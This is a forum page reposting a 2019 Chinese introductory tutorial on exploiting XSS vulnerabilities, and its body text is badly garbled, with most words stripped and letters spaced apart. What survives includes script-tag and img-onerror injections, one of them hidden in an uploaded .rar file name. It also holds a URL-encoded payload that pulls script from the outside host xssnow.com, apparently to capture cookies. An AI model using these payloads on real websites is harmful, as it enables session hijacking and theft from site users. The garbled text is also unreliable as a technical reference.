搜索

[19521] 2019-08-22_【Web安全入门】三个技巧教你玩转XSS漏洞

文档创建者:s7ckTeam
浏览次数:41
最后更新:2025-01-18
2019-08-22_【Web安全入门】三个技巧教你玩转XSS漏洞 W e b X S S i   2 0 1 9 - 0 8 - 2 2 X S S W e b W e b i X S S h t t p s : / / w w w . i c h u n q i u . c o m / s e a r c h / X S S X S S 2 7 W e b
X S S W e b i X S S X S S W e b X S S Q Q 1 1 " " > < i n p u t   v a l u e = " " >
1 c o o k i e X S S 1 1 . r a r < i n p u t   v a l u e = " " # f f 0 0 0 0 " > h t t p % 3 A % 2 F % 2 F x s s n o w . c o m % 2 F d Z J 4 % 3 F % 2 2 % 2 B M a t h . r a n d o m % 2 8 % 2 9 % 3 B % 2 8 d o c u m e n t . g e t E l e m e n t s B y T a g N a m e % 2 8 % 2 2 H E A D % 2 2 % 2 9 % 5 B 0 % 5 D % 7 C % 7 C d o c u m e n t . b o d y % 2 9 . a p p e n d C h i l d % 2 8 b % 2 9 % 3 B / . s o u r c e ) ) ; " > < a   h r e f = " h t t p : / / 1 2 7 . 0 . 0 . 1 / u p l o a d / 1 . r a r " > t e s t < / a >
W i n d o w s
1   <   > J S J S " > < s c r i p t > a l e r t ( 1 ) < / s c r i p t > . r a r
J S
0 1 0 2 0 3 0 4 0 5 0 6 0 7 0 8 0 9 1 0 1 1 1 2         < h e a d > < h t m l > < h e a d > < s c r i p t >                 n a m e = s q l e r                 < / s c r i p t > < / h e a d > < b o d y > w e l c o m e   s q l e r < / b o d y > < / h t m l >
1 < / s c r i p t > < / h e a d > < b o d y > < i m g   s r c = x   o n e r r o r = a l e r t ( 1 ) >
X S S W e b C S R F W e b s h e l l S Q L W e b i i c h u n q i u . c o m / t r a i n W e b 线 W e b W e b
1 W e b 2 W e b 3 W e b 4 5 使 W e b W e b 使 1 2 3 E n d
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理